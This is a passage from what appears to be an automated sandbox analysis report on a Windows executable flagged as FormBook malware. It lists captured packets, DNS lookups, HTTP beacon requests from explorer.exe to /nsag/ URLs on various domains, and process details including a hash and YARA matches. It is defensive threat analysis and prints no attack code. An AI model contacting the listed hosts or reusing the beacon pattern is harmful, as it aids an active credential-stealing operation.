                                                                                    • Total Packets: 69
                                                                                    • 80 (HTTP)
                                                                                    • 53 (DNS)
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 3, 2021 08:08:07.740595102 CET4972880192.168.2.3172.67.223.7
                                                                                    Mar 3, 2021 08:08:07.799659967 CET8049728172.67.223.7192.168.2.3
                                                                                    Mar 3, 2021 08:08:07.799824953 CET4972880192.168.2.3172.67.223.7
                                                                                    Mar 3, 2021 08:08:07.800009966 CET4972880192.168.2.3172.67.223.7
                                                                                    Mar 3, 2021 08:08:07.861560106 CET8049728172.67.223.7192.168.2.3
                                                                                    Mar 3, 2021 08:08:07.990852118 CET8049728172.67.223.7192.168.2.3
                                                                                    Mar 3, 2021 08:08:07.990875006 CET8049728172.67.223.7192.168.2.3
                                                                                    Mar 3, 2021 08:08:07.990883112 CET8049728172.67.223.7192.168.2.3
                                                                                    Mar 3, 2021 08:08:07.991092920 CET4972880192.168.2.3172.67.223.7
                                                                                    Mar 3, 2021 08:08:07.991147995 CET4972880192.168.2.3172.67.223.7
                                                                                    Mar 3, 2021 08:08:07.991221905 CET4972880192.168.2.3172.67.223.7
                                                                                    Mar 3, 2021 08:08:13.374650955 CET4972980192.168.2.3103.88.34.80
                                                                                    Mar 3, 2021 08:08:16.398051023 CET4972980192.168.2.3103.88.34.80
                                                                                    Mar 3, 2021 08:08:22.399024963 CET4972980192.168.2.3103.88.34.80
                                                                                    Mar 3, 2021 08:08:36.715867996 CET4973680192.168.2.3103.88.34.80
                                                                                    Mar 3, 2021 08:08:39.728146076 CET4973680192.168.2.3103.88.34.80
                                                                                    Mar 3, 2021 08:08:45.728641987 CET4973680192.168.2.3103.88.34.80
                                                                                    Mar 3, 2021 08:08:49.676316023 CET4973980192.168.2.3184.168.131.241
                                                                                    Mar 3, 2021 08:08:49.859278917 CET8049739184.168.131.241192.168.2.3
                                                                                    Mar 3, 2021 08:08:49.862329006 CET4973980192.168.2.3184.168.131.241
                                                                                    Mar 3, 2021 08:08:49.862536907 CET4973980192.168.2.3184.168.131.241
                                                                                    Mar 3, 2021 08:08:50.045519114 CET8049739184.168.131.241192.168.2.3
                                                                                    Mar 3, 2021 08:08:50.060493946 CET8049739184.168.131.241192.168.2.3
                                                                                    Mar 3, 2021 08:08:50.060524940 CET8049739184.168.131.241192.168.2.3
                                                                                    Mar 3, 2021 08:08:50.060736895 CET4973980192.168.2.3184.168.131.241
                                                                                    Mar 3, 2021 08:08:50.060825109 CET4973980192.168.2.3184.168.131.241
                                                                                    Mar 3, 2021 08:08:50.243590117 CET8049739184.168.131.241192.168.2.3
                                                                                    Mar 3, 2021 08:08:55.167289972 CET4974080192.168.2.3217.160.0.236
                                                                                    Mar 3, 2021 08:08:55.211918116 CET8049740217.160.0.236192.168.2.3
                                                                                    Mar 3, 2021 08:08:55.212555885 CET4974080192.168.2.3217.160.0.236
                                                                                    Mar 3, 2021 08:08:55.212816954 CET4974080192.168.2.3217.160.0.236
                                                                                    Mar 3, 2021 08:08:55.256674051 CET8049740217.160.0.236192.168.2.3
                                                                                    Mar 3, 2021 08:08:55.259952068 CET8049740217.160.0.236192.168.2.3
                                                                                    Mar 3, 2021 08:08:55.259985924 CET8049740217.160.0.236192.168.2.3
                                                                                    Mar 3, 2021 08:08:55.260194063 CET4974080192.168.2.3217.160.0.236
                                                                                    Mar 3, 2021 08:08:55.260270119 CET4974080192.168.2.3217.160.0.236
                                                                                    Mar 3, 2021 08:08:55.303860903 CET8049740217.160.0.236192.168.2.3
                                                                                    Mar 3, 2021 08:09:00.475367069 CET4974180192.168.2.3170.178.168.203
                                                                                    Mar 3, 2021 08:09:00.671402931 CET8049741170.178.168.203192.168.2.3
                                                                                    Mar 3, 2021 08:09:00.671519041 CET4974180192.168.2.3170.178.168.203
                                                                                    Mar 3, 2021 08:09:00.671694040 CET4974180192.168.2.3170.178.168.203
                                                                                    Mar 3, 2021 08:09:00.904683113 CET8049741170.178.168.203192.168.2.3
                                                                                    Mar 3, 2021 08:09:00.905263901 CET4974180192.168.2.3170.178.168.203
                                                                                    Mar 3, 2021 08:09:00.905339003 CET4974180192.168.2.3170.178.168.203
                                                                                    Mar 3, 2021 08:09:01.101613045 CET8049741170.178.168.203192.168.2.3
                                                                                    Mar 3, 2021 08:09:11.090845108 CET4974280192.168.2.334.102.136.180
                                                                                    Mar 3, 2021 08:09:11.129087925 CET804974234.102.136.180192.168.2.3
                                                                                    Mar 3, 2021 08:09:11.129565001 CET4974280192.168.2.334.102.136.180
                                                                                    Mar 3, 2021 08:09:11.130256891 CET4974280192.168.2.334.102.136.180
                                                                                    Mar 3, 2021 08:09:11.170927048 CET804974234.102.136.180192.168.2.3
                                                                                    Mar 3, 2021 08:09:11.269534111 CET804974234.102.136.180192.168.2.3
                                                                                    Mar 3, 2021 08:09:11.269556999 CET804974234.102.136.180192.168.2.3
                                                                                    Mar 3, 2021 08:09:11.269769907 CET4974280192.168.2.334.102.136.180
                                                                                    Mar 3, 2021 08:09:12.390512943 CET4974280192.168.2.334.102.136.180
                                                                                    Mar 3, 2021 08:09:12.428850889 CET804974234.102.136.180192.168.2.3
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 3, 2021 08:07:02.572189093 CET4919953192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:02.584414959 CET53512818.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:02.618140936 CET53491998.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:02.727171898 CET5062053192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:02.775921106 CET53506208.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:10.663738966 CET6493853192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:10.712168932 CET53649388.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:12.135627985 CET6015253192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:12.184562922 CET53601528.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:13.709917068 CET5754453192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:13.755708933 CET53575448.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:14.843909979 CET5598453192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:14.892151117 CET53559848.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:16.039441109 CET6418553192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:16.085133076 CET53641858.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:16.981811047 CET6511053192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:17.030885935 CET53651108.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:18.154320002 CET5836153192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:18.200314999 CET53583618.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:19.414899111 CET6349253192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:19.460747004 CET53634928.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:21.261106014 CET6083153192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:21.320060968 CET53608318.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:22.392802000 CET6010053192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:22.438838959 CET53601008.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:23.195377111 CET5319553192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:23.241329908 CET53531958.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:28.459887981 CET5014153192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:28.511447906 CET53501418.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:30.506838083 CET5302353192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:30.552999020 CET53530238.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:31.961904049 CET4956353192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:32.008941889 CET53495638.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:33.387892008 CET5135253192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:33.446693897 CET53513528.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:33.462146997 CET5934953192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:33.510962963 CET53593498.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:34.411458015 CET5708453192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:34.457672119 CET53570848.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:35.313247919 CET5882353192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:35.360244036 CET53588238.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:37.378763914 CET5756853192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:37.427367926 CET53575688.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:07:58.059210062 CET5054053192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:07:58.104897022 CET53505408.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:07.659733057 CET5436653192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:07.734126091 CET53543668.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:13.012520075 CET5303453192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:13.373378038 CET53530348.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:16.470212936 CET5776253192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:16.525774956 CET53577628.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:20.447416067 CET5543553192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:20.517450094 CET53554358.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:36.610662937 CET5071353192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:36.667924881 CET53507138.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:39.451970100 CET5613253192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:39.527894974 CET53561328.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:44.546364069 CET5898753192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:44.610312939 CET53589878.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:47.287533998 CET5657953192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:47.334961891 CET53565798.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:49.329098940 CET6063353192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:49.383326054 CET53606338.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:49.627070904 CET6129253192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:49.674992085 CET53612928.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:08:55.108767986 CET6361953192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:08:55.164676905 CET53636198.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:09:00.266472101 CET6493853192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:09:00.473987103 CET53649388.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:09:10.974236012 CET6194653192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:09:11.034506083 CET53619468.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:09:17.404759884 CET6491053192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:09:17.462021112 CET53649108.8.8.8192.168.2.3
                                                                                    Mar 3, 2021 08:09:22.577244997 CET5212353192.168.2.38.8.8.8
                                                                                    Mar 3, 2021 08:09:22.627926111 CET53521238.8.8.8192.168.2.3
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Mar 3, 2021 08:08:07.659733057 CET192.168.2.38.8.8.80xf3d8Standard query (0)www.worldsourcecloud.comA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:13.012520075 CET192.168.2.38.8.8.80x16ecStandard query (0)www.856380692.xyzA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:36.610662937 CET192.168.2.38.8.8.80x1360Standard query (0)www.856380692.xyzA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:39.451970100 CET192.168.2.38.8.8.80x8719Standard query (0)www.clericallyco.comA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:44.546364069 CET192.168.2.38.8.8.80x2596Standard query (0)www.evoslancete.comA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:49.627070904 CET192.168.2.38.8.8.80x5891Standard query (0)www.tencenttexts.comA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:55.108767986 CET192.168.2.38.8.8.80x538eStandard query (0)www.glowtheblog.comA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:09:00.266472101 CET192.168.2.38.8.8.80x95b8Standard query (0)www.myfeezinc.comA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:09:10.974236012 CET192.168.2.38.8.8.80xd80dStandard query (0)www.wholesalerbargains.comA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:09:17.404759884 CET192.168.2.38.8.8.80x2c1dStandard query (0)www.usopencoverage.comA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:09:22.577244997 CET192.168.2.38.8.8.80xe852Standard query (0)www.explorerthecity.comA (IP address)IN (0x0001)
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Mar 3, 2021 08:08:07.734126091 CET8.8.8.8192.168.2.30xf3d8No error (0)www.worldsourcecloud.com172.67.223.7A (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:07.734126091 CET8.8.8.8192.168.2.30xf3d8No error (0)www.worldsourcecloud.com104.21.78.148A (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:13.373378038 CET8.8.8.8192.168.2.30x16ecNo error (0)www.856380692.xyz103.88.34.80A (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:36.667924881 CET8.8.8.8192.168.2.30x1360No error (0)www.856380692.xyz103.88.34.80A (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:39.527894974 CET8.8.8.8192.168.2.30x8719Name error (3)www.clericallyco.comnonenoneA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:44.610312939 CET8.8.8.8192.168.2.30x2596Name error (3)www.evoslancete.comnonenoneA (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:49.674992085 CET8.8.8.8192.168.2.30x5891No error (0)www.tencenttexts.comtencenttexts.comCNAME (Canonical name)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:49.674992085 CET8.8.8.8192.168.2.30x5891No error (0)tencenttexts.com184.168.131.241A (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:08:55.164676905 CET8.8.8.8192.168.2.30x538eNo error (0)www.glowtheblog.com217.160.0.236A (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:09:00.473987103 CET8.8.8.8192.168.2.30x95b8No error (0)www.myfeezinc.com170.178.168.203A (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:09:11.034506083 CET8.8.8.8192.168.2.30xd80dNo error (0)www.wholesalerbargains.comwholesalerbargains.comCNAME (Canonical name)IN (0x0001)
                                                                                    Mar 3, 2021 08:09:11.034506083 CET8.8.8.8192.168.2.30xd80dNo error (0)wholesalerbargains.com34.102.136.180A (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:09:17.462021112 CET8.8.8.8192.168.2.30x2c1dNo error (0)www.usopencoverage.com94.136.40.51A (IP address)IN (0x0001)
                                                                                    Mar 3, 2021 08:09:22.627926111 CET8.8.8.8192.168.2.30xe852No error (0)www.explorerthecity.com91.195.240.94A (IP address)IN (0x0001)
                                                                                    • www.worldsourcecloud.com
                                                                                    • www.tencenttexts.com
                                                                                    • www.glowtheblog.com
                                                                                    • www.myfeezinc.com
                                                                                    • www.wholesalerbargains.com
                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.349728172.67.223.780C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Mar 3, 2021 08:08:07.800009966 CET1204OUTGET /nsag/?Ntfttf=nlvt&Bd68427=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4EBz+9KVsHtfB HTTP/1.1
                                                                                    Host: www.worldsourcecloud.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:08:07.990852118 CET1205INHTTP/1.1 403 Forbidden
                                                                                    Date: Wed, 03 Mar 2021 07:08:07 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: __cfduid=d22be81437ad17930f3ebd3bbdb127d9c1614755287; expires=Fri, 02-Apr-21 07:08:07 GMT; path=/; domain=.worldsourcecloud.com; HttpOnly; SameSite=Lax
                                                                                    Via: 1.1 google
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    cf-request-id: 0898836b1d00004c4f9338b000000001
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Iciya%2B5xBL%2F5aVgPTjXmDVNrNFNawHuFrO2jpNAz%2FhJp%2FVRs2Jpwt0O4unf6X6vRDcJhLf3gKgQqnSCAHvS36hQsplxirY4KxXg%2BKC7p4oDR25m3cvWq%2B8k%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 62a10824f8c14c4f-AMS
                                                                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                    Data Raw: 31 31 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                    Data Ascii: 113<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
                                                                                    Mar 3, 2021 08:08:07.990875006 CET1205INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.349739184.168.131.24180C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Mar 3, 2021 08:08:49.862536907 CET5822OUTGET /nsag/?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL HTTP/1.1
                                                                                    Host: www.tencenttexts.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:08:50.060493946 CET5823INHTTP/1.1 301 Moved Permanently
                                                                                    Server: nginx/1.16.1
                                                                                    Date: Wed, 03 Mar 2021 07:08:49 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Location: https://www.grassfire.us/10CentTexting?Ntfttf=nlvt&Bd68427=1KNBKkR/3sxsfy5Hm2m4k9rliP52H6WM2eUoblDVMc3evr5lbTgPZczIDguYEb443quL
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.2.349740217.160.0.23680C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Mar 3, 2021 08:08:55.212816954 CET5824OUTGET /nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt HTTP/1.1
                                                                                    Host: www.glowtheblog.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:08:55.259952068 CET5824INHTTP/1.1 301 Moved Permanently
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Content-Length: 334
                                                                                    Connection: close
                                                                                    Date: Wed, 03 Mar 2021 07:08:55 GMT
                                                                                    Server: Apache
                                                                                    Location: https://www.glowtheblog.com/nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&Ntfttf=nlvt
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6c 6f 77 74 68 65 62 6c 6f 67 2e 63 6f 6d 2f 6e 73 61 67 2f 3f 42 64 36 38 34 32 37 3d 48 7a 5a 50 4e 4a 51 2b 54 2f 4c 37 2f 4d 42 73 34 76 66 61 54 36 6b 32 73 42 63 6b 6b 59 69 67 6d 2f 51 32 4b 63 68 36 74 68 36 6b 5a 58 75 4b 71 2b 2b 4c 66 52 49 6a 6b 79 51 6f 79 69 50 46 56 79 4d 51 26 61 6d 70 3b 4e 74 66 74 74 66 3d 6e 6c 76 74 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.glowtheblog.com/nsag/?Bd68427=HzZPNJQ+T/L7/MBs4vfaT6k2sBckkYigm/Q2Kch6th6kZXuKq++LfRIjkyQoyiPFVyMQ&amp;Ntfttf=nlvt">here</a>.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    3192.168.2.349741170.178.168.20380C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Mar 3, 2021 08:09:00.671694040 CET5825OUTGET /nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR HTTP/1.1
                                                                                    Host: www.myfeezinc.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:09:00.904683113 CET5826INHTTP/1.1 302 Found
                                                                                    Date: Wed, 03 Mar 2021 07:09:00 GMT
                                                                                    Server: Apache/2.4.25 (Debian)
                                                                                    Set-Cookie: __tad=1614755340.5339234; expires=Sat, 01-Mar-2031 07:09:00 GMT; Max-Age=315360000
                                                                                    Location: http://ww25.myfeezinc.com/nsag/?Ntfttf=nlvt&Bd68427=AXehkXJ24fX3Q+umAOPXC/XvfFX0gl1EYu2dc8RW2os5zkvGOL3BkU/yF/W58Bsr/nBR&subid1=20210303-1809-0088-be0d-0c09ea32fcb7
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    4192.168.2.34974234.102.136.18080C:\Windows\explorer.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Mar 3, 2021 08:09:11.130256891 CET5827OUTGET /nsag/?Ntfttf=nlvt&Bd68427=S2rwVw3s97Y3rUXATn0CJ3djiO7xqRLsdPZLFd7esiUzXfKx0EjNJIkpU7K33DVUY0dk HTTP/1.1
                                                                                    Host: www.wholesalerbargains.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 3, 2021 08:09:11.269534111 CET5827INHTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Wed, 03 Mar 2021 07:09:11 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "60363547-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    • File
                                                                                    • Network

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    Start time:08:07:08
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Users\user\Desktop\Nz7NA3F7z7.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
                                                                                    Imagebase:0x400000
                                                                                    File size:223664 bytes
                                                                                    MD5 hash:059A1308EBDFAE6EE52FD646D341AEAC
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low
                                                                                    Start time:08:07:09
                                                                                    Start date:03/03/2021
                                                                                    Path:C:\Users\user\Desktop\Nz7NA3F7z7.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\Nz7NA3F7z7.exe'
                                                                                    Imagebase:0x400000
